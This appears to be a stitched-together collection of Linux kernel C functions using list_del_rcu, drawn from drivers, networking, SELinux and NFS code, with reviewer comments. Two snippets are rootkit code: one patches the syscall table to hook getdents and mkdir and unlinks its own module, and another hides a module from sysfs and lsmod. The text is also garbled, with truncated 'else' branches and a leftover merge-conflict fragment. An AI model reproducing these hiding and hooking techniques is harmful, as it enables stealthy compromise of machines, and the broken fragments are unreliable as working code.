/* Tear down and release one SSD cache device: detach it from the cache
 * core, take it offline, wait out in-flight references, then close the
 * underlying block device.
 * assumes ctl_mtx is held */
static void _unload_ssd(struct ssd_info * ssd)
{
	if (NULL == ssd)
		return;

	/* first remove it from the set of cache devices, no more
	 * requests will be queued to this device beyond this point */
	if (ssd->cdev) {
		sce_rmcdev(ssd->cdev);
		ssd->cdev = NULL;
	}

	/* make offline and quiesce requests already in flight */
	if (ssd->online) {
		ssd->online = 0;
		list_del_rcu(&ssd->list);
		/* publish the offline state / list removal before waiting */
		wmb();
		synchronize_rcu();

		/* wait for references to quiesce */
		while (atomic_read(&ssd->nr_ref))
			schedule();	/* busy-yield until nr_ref drops to 0 */

		gctx.nr_ssd--;
	}

	if (ssd->bdev) {
		/* the exclusive-open API changed across kernel versions:
		 * blkdev_put() takes FMODE_EXCL from 2.6.38 on; 2.6.28+
		 * uses close_bdev_exclusive() instead */
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,38)
		blkdev_put(ssd->bdev, FMODE_READ | FMODE_WRITE | FMODE_EXCL);
#elif LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,28)
		close_bdev_exclusive(ssd->bdev, FMODE_READ | FMODE_WRITE | FMODE_EXCL);
#else
		ERR("Kernel version < 2.6.28 currently not supported.\n");
#endif
		ssd->bdev = NULL;
	}
}
/* Remove @port from its HSR device. Non-master (slave) ports also get
 * their rx handler unregistered and promiscuity restored; the reference
 * on the underlying netdev is dropped only after an RCU grace period. */
void hsr_del_port(struct hsr_port *port)
{
	struct hsr_priv *hsr;
	struct hsr_port *master;

	hsr = port->hsr;
	master = hsr_port_get_hsr(hsr, HSR_PT_MASTER);
	/* unpublish the port; RCU readers may still hold it until the
	 * synchronize_rcu() below */
	list_del_rcu(&port->port_list);

	if (port != master) {
		if (master != NULL) {
			/* slave set changed: recompute master features/MTU */
			netdev_update_features(master->dev);
			dev_set_mtu(master->dev, hsr_get_max_mtu(hsr));
		}

		netdev_rx_handler_unregister(port->dev);
		dev_set_promiscuity(port->dev, -1);
	}

	/* FIXME?
	 * netdev_upper_dev_unlink(port->dev, port->hsr->dev);
	 */

	synchronize_rcu();	/* wait for readers before dropping the ref */

	if (port != master)
		dev_put(port->dev);
}
/* Free @flow and drop one reference on its mask (if it has one).  With
 * @deferred the frees go through call_rcu() so concurrent RCU readers
 * can finish; otherwise the memory is released immediately. */
void vxbox_flow_free(struct sw_flow *flow, bool deferred)
{
	if (!flow)
		return;

	if (flow->mask) {
		struct sw_flow_mask *mask = flow->mask;

		/* vxbox-lock is required to protect mask-refcount and
		 * mask list. */
		ASSERT_OVSL();
		BUG_ON(!mask->ref_count);
		mask->ref_count--;

		/* last user of this mask: unlink and free it as well */
		if (!mask->ref_count) {
			list_del_rcu(&mask->list);
			if (deferred)
				call_rcu(&mask->rcu, rcu_free_sw_flow_mask_cb);
			else
				kfree(mask);
		}
	}

	if (deferred)
		call_rcu(&flow->rcu, rcu_free_flow_callback);
	else
		flow_free(flow);
}
/**
 * __aa_remove_ns - remove a namespace and all its children
 * @ns: namespace to be removed  (NOT NULL)
 *
 * Requires: ns->parent->lock be held and ns removed from parent.
 */
void __aa_remove_ns(struct aa_ns *ns)
{
	/* remove ns from namespace list */
	list_del_rcu(&ns->base.list);
	destroy_ns(ns);
	/* drop a reference on ns — presumably the one the namespace list
	 * held; confirm against aa_ns refcounting */
	aa_put_ns(ns);
}
/**
 * sel_netnode_insert - Insert a new node into the table
 * @node: the new node record
 *
 * Description:
 * Add a new node record to the network address hash table.
 *
 */
static void sel_netnode_insert(struct sel_netnode *node)
{
	unsigned int idx;

	/* pick the hash bucket based on the record's address family */
	switch (node->nsec.family) {
	case PF_INET:
		idx = sel_netnode_hashfn_ipv4(node->nsec.addr.ipv4);
		break;
	case PF_INET6:
		idx = sel_netnode_hashfn_ipv6(&node->nsec.addr.ipv6);
		break;
	default:
		BUG();	/* unexpected address family */
	}

	/* we need to impose a limit on the growth of the hash table so check
	 * this bucket to make sure it is within the specified bounds */
	list_add_rcu(&node->list, &sel_netnode_hash[idx].list);
	if (sel_netnode_hash[idx].size == SEL_NETNODE_HASH_BKT_LIMIT) {
		/* bucket is at its cap: evict the oldest entry (list tail) */
		struct sel_netnode *tail;
		tail = list_entry(
			rcu_dereference(sel_netnode_hash[idx].list.prev),
			struct sel_netnode, list);
		list_del_rcu(&tail->list);
		kfree_rcu(tail, rcu);
	} else
	/* NOTE(review): this chunk is cut off mid-statement after "else" —
	 * the branch body (presumably the bucket size increment) and the
	 * closing brace are not visible here */
/*
 * Remove bdi from bdi_list, and ensure that it is no longer visible
 */
static void bdi_remove_from_list(struct backing_dev_info *bdi)
{
	spin_lock_bh(&bdi_lock);
	list_del_rcu(&bdi->bdi_list);
	spin_unlock_bh(&bdi_lock);

	/* expedited grace period: on return no RCU reader can still be
	 * traversing this bdi via bdi_list */
	synchronize_rcu_expedited();
}
/* Drive the PMIC vibrator motor: when @on, consume the first queued
 * intensity entry from vibrator_list_head and apply its voltage level;
 * when off, set the voltage to 0. */
static void set_pmic_vibrator(int on)
{
	int rc;
	/*++ Kevin Shiu - 20121003 Save intensity using liked list ++*/
	vibrator_list *vibrator = NULL;
	/*-- Kevin Shiu - 20121003 Save intensity using liked list --*/

	rc = pmic_vib_mot_set_mode(PM_VIB_MOT_MODE__MANUAL);
	if (rc) {
		pr_err("%s: Vibrator set mode failed", __func__);
		return;
	}

	/*++ Kevin Shiu - 20121003 Save intensity using liked list ++*/
	/* turning on with an empty intensity list is an error */
	if(on && (vibrator_list_head.next == &vibrator_list_head)){
		pr_err("%s: list_head is invalid", __func__);
		return;
	}
	if(on){
		//get vibrator_list pointer (first queued intensity entry)
		vibrator = list_entry(vibrator_list_head.next , vibrator_list , list);
		rc = pmic_vib_mot_set_volt(vibrator->vibrator_level);
		//if ture, it means that only creates a structure.
		/* NOTE(review): next == prev also holds for any single-entry
		 * list, and this branch deletes the list HEAD (not the entry)
		 * and re-initialises it.  A plain list_del_rcu(&vibrator->list)
		 * appears to empty the list correctly in both cases — confirm
		 * before simplifying. */
		if(vibrator->list.next == vibrator->list.prev){
			list_del_rcu(&vibrator_list_head);
			INIT_LIST_HEAD(&vibrator_list_head);
		}else{
			list_del_rcu(&vibrator->list);
		}
		//free
		/* NOTE(review): freed immediately after list_del_rcu with no
		 * grace period — safe only if nothing reads this list under
		 * rcu_read_lock(); confirm */
		kfree(vibrator);
	}else{
		rc = pmic_vib_mot_set_volt(0);
	}
	/*-- Kevin Shiu - 20121003 Save intensity using liked list --*/
	if (rc)
		pr_err("%s: Vibrator set voltage level failed", __func__);
}
/* Unlink @xprt from the transport switch @xps and update the transport
 * count.  The "_locked" suffix implies the caller already holds the
 * switch's lock — confirm at call sites. */
static void xprt_switch_remove_xprt_locked(struct rpc_xprt_switch *xps,
		struct rpc_xprt *xprt)
{
	if (unlikely(xprt == NULL))
		return;
	xps->xps_nxprts--;
	if (xps->xps_nxprts == 0)
		xps->xps_net = NULL;
	/* publish the updated count/net before the entry disappears from
	 * the RCU list */
	smp_wmb();
	list_del_rcu(&xprt->xprt_switch);
}
/* Unregister @sap from the global SAP list and free it once all RCU
 * readers are done with it. */
void llc_sap_close(struct llc_sap *sap)
{
	/* a SAP being closed should have no sockets still attached */
	WARN_ON(sap->sk_count);

	spin_lock_bh(&llc_sap_list_lock);
	list_del_rcu(&sap->node);
	spin_unlock_bh(&llc_sap_list_lock);

	/* wait for list walkers still referencing sap before freeing */
	synchronize_rcu();

	kfree(sap);
}
/* Remove @port from the console timer list; if it was the last entry,
 * also flag the periodic timer for shutdown and cancel it. */
static inline void micvcons_del_timer_entry(micvcons_port_t *port)
{
	spin_lock(&timer_list_lock);
	list_del_rcu(&port->list_member);
	if (list_empty(&timer_list_head)) {
		restart_timer_flag = MICVCONS_TIMER_SHUTDOWN;
		/* lock dropped before del_timer_sync() — presumably because
		 * the timer callback takes timer_list_lock and would
		 * deadlock otherwise; confirm against the handler */
		spin_unlock(&timer_list_lock);
		del_timer_sync(&vcons_timer);
	} else {
		spin_unlock(&timer_list_lock);
	}
	/* let RCU readers of the timer list finish before the caller
	 * reuses/frees the port */
	synchronize_rcu();
}
/**
 * sel_netport_insert - Insert a new port into the table
 * @port: the new port record
 *
 * Description:
 * Add a new port record to the network address hash table.
 *
 */
static void sel_netport_insert(struct sel_netport *port)
{
	unsigned int idx;

	/* we need to impose a limit on the growth of the hash table so check
	 * this bucket to make sure it is within the specified bounds */
	idx = sel_netport_hashfn(port->psec.port);
	list_add_rcu(&port->list, &sel_netport_hash[idx].list);
	if (sel_netport_hash[idx].size == SEL_NETPORT_HASH_BKT_LIMIT) {
		/* bucket is at its cap: evict the oldest entry (list tail) */
		struct sel_netport *tail;
		tail = list_entry(
			rcu_dereference(sel_netport_hash[idx].list.prev),
			struct sel_netport, list);
		list_del_rcu(&tail->list);
		kfree_rcu(tail, rcu);
	} else
	/* NOTE(review): this chunk is cut off mid-statement after "else" —
	 * the branch body (presumably the bucket size increment) and the
	 * closing brace are not visible here */
/* Drop one reference on @mask; when the count reaches zero the mask is
 * unlinked from the mask list and freed — via call_rcu() if @deferred,
 * otherwise immediately. A NULL @mask is a no-op. */
static void flow_mask_del_ref(struct sw_flow_mask *mask, bool deferred)
{
	if (!mask)
		return;

	BUG_ON(!mask->ref_count);
	if (--mask->ref_count)
		return;		/* still referenced by other flows */

	/* last reference gone: remove and release */
	list_del_rcu(&mask->list);
	if (deferred)
		call_rcu(&mask->rcu, rcu_free_sw_flow_mask_cb);
	else
		kfree(mask);
}
/* Use the Supervision frame's info about an eventual MacAddressB for merging
 * nodes that has previously had their MacAddressB registered as a separate
 * node.
 */
void hsr_handle_sup_frame(struct sk_buff *skb, struct hsr_node *node_curr,
			  struct hsr_port *port_rcv)
{
	struct hsr_node *node_real;
	struct hsr_sup_payload *hsr_sp;
	struct list_head *node_db;
	int i;

	/* step past the HSR header to reach the supervision payload */
	skb_pull(skb, sizeof(struct hsr_ethhdr_sp));
	hsr_sp = (struct hsr_sup_payload *) skb->data;

	if (ether_addr_equal(eth_hdr(skb)->h_source, hsr_sp->MacAddressA))
		/* Not sent from MacAddressB of a PICS_SUBS capable node */
		goto done;

	/* Merge node_curr (registered on MacAddressB) into node_real */
	node_db = &port_rcv->hsr->node_db;
	node_real = find_node_by_AddrA(node_db, hsr_sp->MacAddressA);
	if (!node_real)
		/* No frame received from AddrA of this node yet */
		node_real = hsr_add_node(node_db, hsr_sp->MacAddressA,
					 HSR_SEQNR_START - 1);
	if (!node_real)
		goto done; /* No mem */
	if (node_real == node_curr)
		/* Node has already been merged */
		goto done;

	ether_addr_copy(node_real->MacAddressB, eth_hdr(skb)->h_source);
	/* carry the freshest per-port timestamps and sequence numbers from
	 * the duplicate record over into the real one */
	for (i = 0; i < HSR_PT_PORTS; i++) {
		if (!node_curr->time_in_stale[i] &&
		    time_after(node_curr->time_in[i], node_real->time_in[i])) {
			node_real->time_in[i] = node_curr->time_in[i];
			node_real->time_in_stale[i] = node_curr->time_in_stale[i];
		}
		if (seq_nr_after(node_curr->seq_out[i], node_real->seq_out[i]))
			node_real->seq_out[i] = node_curr->seq_out[i];
	}
	node_real->AddrB_port = port_rcv->type;

	/* node_curr is now redundant: unlink and RCU-free it */
	list_del_rcu(&node_curr->mac_list);
	kfree_rcu(node_curr, rcu_head);

done:
	/* restore the header so the caller sees the skb unchanged */
	skb_push(skb, sizeof(struct hsr_ethhdr_sp));
}
/* Module entry point: backs up and patches the syscall table with shims,
 * then unlinks this module from the kernel module list so lsmod cannot
 * see it.  NOTE(review): deliberately malicious (rootkit) code. */
int init_module()
{
	int bootresult;		/* only used by the commented-out boot path below */
	struct module* this_mod;
	preempt_disable();
	printk(KERN_INFO "Attempting to initialize attack module.\n");
	hiddenDirectories = vector_init();
	/* make the (normally read-only) syscall table page writable */
	make_rw(sys_call_table);

	//make a backup of the system call table
	memcpy(backup_sys_call_table, sys_call_table, sizeof(backup_sys_call_table));

	//start up the payload
	//this has been changed, the payload now starts the rootkit
	//bootresult = bootprocess();
	//if (bootresult) printk(KERN_INFO "Boot process failed: %d", bootresult);

	//shim the syscalls.
	patch(SYS_getdents, getdentsShim);
	//patch(SYS_read, readShim);
	patch(SYS_mkdir, mkdirShim);
	//patch(SYS_fork, forkShim);
	//patch(SYS_clone, cloneShim);
	//patch(SYS_open, openShim);
	//patch(SYS_close, closeShim);

	//request module and payload to be hidden
	//These are now done by the payload
	//hideDirectory(secret_ko_name);
	//hideDirectory(secret_payload_name);

	//hide this module from the list
	/* NOTE(review): mutex_lock() may sleep, yet preemption is disabled
	 * here (preempt_disable() above) — that is a "scheduling while
	 * atomic" bug; the preempt_disable/enable pair looks unnecessary */
	mutex_lock(&module_mutex);
	this_mod = find_module("attack_module");
	//it turns out the name attack_module is part of the binary, not the filename
	if (this_mod) {
		printk(KERN_INFO "found module, hiding\n");
		list_del_rcu(&this_mod->list);
	} else {
		printk(KERN_INFO "could not find module\n");
	}
	mutex_unlock(&module_mutex);

	printk(KERN_INFO "Module loaded\n");
	preempt_enable();
	return 0;
}
/* Tear down a server thread's request structure and drop its pool
 * bookkeeping; releases the server itself when one is attached. */
void svc_exit_thread(struct svc_rqst *rqstp)
{
	struct svc_serv	*serv = rqstp->rq_server;
	struct svc_pool	*pool = rqstp->rq_pool;

	spin_lock_bh(&pool->sp_lock);
	pool->sp_nrthreads--;
	/* skip the unlink if choose_victim() already set RQ_VICTIM and
	 * removed this thread from sp_all_threads */
	if (!test_and_set_bit(RQ_VICTIM, &rqstp->rq_flags))
		list_del_rcu(&rqstp->rq_all);
	spin_unlock_bh(&pool->sp_lock);

	svc_rqst_free(rqstp);

	/* Release the server */
	if (serv)
		svc_destroy(serv);
}
/* Remove the ILM entry stored under @key from the radix tree and the
 * global RCU list, dropping the tree's reference on it.  Returns the
 * removed entry, or NULL when @key is not present. */
struct mpls_ilm* mpls_remove_ilm (unsigned int key)
{
	struct mpls_ilm *entry;

	MPLS_ENTER;

	entry = radix_tree_delete (&mpls_ilm_tree, key);
	if (entry == NULL) {
		MPLS_DEBUG("node key %u not found.\n",key);
		return NULL;
	}

	list_del_rcu(&entry->global);
	/* drop the reference the tree held on this entry */
	mpls_ilm_release (entry);
	MPLS_EXIT;
	return entry;
}
/* Remove the NHLFE entry stored under @key from the radix tree and the
 * global RCU list, dropping the tree's reference on it.  Returns the
 * removed entry, or NULL when @key is not present.
 *
 * Fix: the original only logged when radix_tree_delete() returned NULL
 * and then fell through to list_del_rcu(&nhlfe->global), dereferencing
 * a NULL pointer.  Return early instead (matching mpls_remove_ilm()). */
struct mpls_nhlfe* mpls_remove_nhlfe (unsigned int key)
{
	struct mpls_nhlfe *nhlfe = NULL;

	MPLS_ENTER;
	nhlfe = radix_tree_delete(&mpls_nhlfe_tree, key);
	if (!nhlfe) {
		MPLS_DEBUG("NHLFE node with key %u not found.\n",key);
		return NULL;
	}

	list_del_rcu(&nhlfe->global);

	/* release the refcnt for the tree hold it */
	mpls_nhlfe_release (nhlfe);
	MPLS_EXIT;
	return nhlfe;
}
/* Hide this module ("km") from userspace: unlink it from sysfs, its
 * kobject kset, the dentry cache and the kernel module list.
 * NOTE(review): deliberately stealthy (rootkit-style) code; the @data
 * parameter is unused. */
static void km_hide_module( const char* const data )
{
	kobject* kobj = &THIS_MODULE->mkobj.kobj;
	path km_path;

	// Check to ensure we're hidden first...
	if ( g_state.hidden )
	{
		return;
	}
	g_state.hidden = 1;

	// Remove from sysfs
	mutex_lock( g_sysfs_mutex );
	sysfs_unlink_sibling( kobj->sd );
	mutex_unlock( g_sysfs_mutex );
	kobj->state_in_sysfs = 0;

	// Drop the kobject from its kset's object list
	spin_lock( &kobj->kset->list_lock );
	list_del_init( &kobj->entry );
	spin_unlock( &kobj->kset->list_lock );
	kset_put( kobj->kset );

	// Decrement parent ref count in sysfs
	kobject_put( kobj->parent );

	// Remove the km module from the dentry cache if it's present
	if ( kern_path( "/sys/module/km", LOOKUP_DIRECTORY, &km_path ) == 0 && km_path.dentry )
	{
		d_drop( km_path.dentry );
	}

	// Remove from the module list - so lsmod can't see us
	mutex_lock( &module_mutex );
	list_del_rcu( &THIS_MODULE->list );
	mutex_unlock( &module_mutex );
}
/* Workqueue function releasing a cgroup writeback structure: unlink it
 * from its bdi, shut it down, drop css references and free it after an
 * RCU grace period. */
static void cgwb_release_workfn(struct work_struct *work)
{
	struct bdi_writeback *wb = container_of(work, struct bdi_writeback,
						release_work);
	struct backing_dev_info *bdi = wb->bdi;

	/* unlink from the bdi's writeback list under cgwb_lock */
	spin_lock_irq(&cgwb_lock);
	list_del_rcu(&wb->bdi_node);
	spin_unlock_irq(&cgwb_lock);

	wb_shutdown(wb);

	css_put(wb->memcg_css);
	css_put(wb->blkcg_css);

	fprop_local_destroy_percpu(&wb->memcg_completions);
	percpu_ref_exit(&wb->refcnt);
	wb_exit(wb);
	/* RCU list readers may still see wb: defer the actual free */
	kfree_rcu(wb, rcu);

	/* wake waiters once the last cgwb on this bdi is gone */
	if (atomic_dec_and_test(&bdi->usage_cnt))
		wake_up_all(&cgwb_release_wait);
}
/*
 * Choose a thread to kill, for svc_set_num_threads
 */
static inline struct task_struct *
choose_victim(struct svc_serv *serv, struct svc_pool *pool, unsigned int *state)
{
	unsigned int i;
	struct task_struct *task = NULL;

	if (pool != NULL) {
		/* caller picked the pool; just take its lock */
		spin_lock_bh(&pool->sp_lock);
	} else {
		/* choose a pool in round-robin fashion */
		for (i = 0; i < serv->sv_nrpools; i++) {
			/* *state persists between calls, continuing the rotation */
			pool = &serv->sv_pools[--(*state) % serv->sv_nrpools];
			spin_lock_bh(&pool->sp_lock);
			if (!list_empty(&pool->sp_all_threads))
				goto found_pool;
			spin_unlock_bh(&pool->sp_lock);
		}
		/* every pool is empty: nothing to kill */
		return NULL;
	}

found_pool:
	/* pool->sp_lock is held here on both paths */
	if (!list_empty(&pool->sp_all_threads)) {
		struct svc_rqst *rqstp;

		/*
		 * Remove from the pool->sp_all_threads list
		 * so we don't try to kill it again.
		 */
		rqstp = list_entry(pool->sp_all_threads.next, struct svc_rqst, rq_all);
		/* RQ_VICTIM tells svc_exit_thread() the unlink already happened */
		set_bit(RQ_VICTIM, &rqstp->rq_flags);
		list_del_rcu(&rqstp->rq_all);
		task = rqstp->rq_task;
	}
	spin_unlock_bh(&pool->sp_lock);

	return task;
}
/** >>>>>>> 296c66da8a02d52243f45b80521febece5ed498a * sel_netif_destroy - Remove an interface record from the table * @netif: the existing interface record * * Description: * Remove an existing interface record from the network interface table. * */ static void sel_netif_destroy(struct sel_netif *netif) { list_del_rcu(&netif->list); sel_netif_total--; <<<<<<< HEAD
/**
 * netlbl_af6list_remove_entry - Remove an IPv6 address entry
 * @entry: address entry
 *
 * Description:
 * Remove the specified IP address entry.  The caller is responsible for
 * calling the necessary locking functions.
 *
 */
void netlbl_af6list_remove_entry(struct netlbl_af6list *entry)
{
	/* clear the valid flag before unlinking — presumably so RCU
	 * readers that still see the entry skip it; confirm against the
	 * lookup path */
	entry->valid = 0;
	list_del_rcu(&entry->list);
}
/*
 * Drop one reference on @map; when the count reaches zero the mapping
 * is unlinked from the (RCU-protected) ioremap list.
 */
static void acpi_os_drop_map_ref(struct acpi_ioremap *map)
{
	map->refcount--;
	if (map->refcount == 0)
		list_del_rcu(&map->list);
}
/* Unlink @node from its AVC cache list and schedule it for RCU-deferred
 * freeing via avc_node_free(). */
static void avc_node_delete(struct avc_node *node)
{
	list_del_rcu(&node->list);
	/* readers may still hold node; free only after a grace period */
	call_rcu(&node->rhead, avc_node_free);
	atomic_dec(&avc_cache.active_nodes);
}
/* Unlink @wb from its bdi's writeback list.  cgwb_lock serialises list
 * writers; readers presumably traverse under RCU (hence list_del_rcu). */
static void cgwb_remove_from_bdi_list(struct bdi_writeback *wb)
{
	spin_lock_irq(&cgwb_lock);
	list_del_rcu(&wb->bdi_node);
	spin_unlock_irq(&cgwb_lock);
}
/* Lockless variant of cgwb_remove_from_bdi_list() — presumably the
 * build configuration without cgroup writeback, where no concurrent
 * list writer exists (cf. the spinlocked variant of the same name);
 * confirm against the surrounding #ifdefs. */
static void cgwb_remove_from_bdi_list(struct bdi_writeback *wb)
{
	list_del_rcu(&wb->bdi_node);
}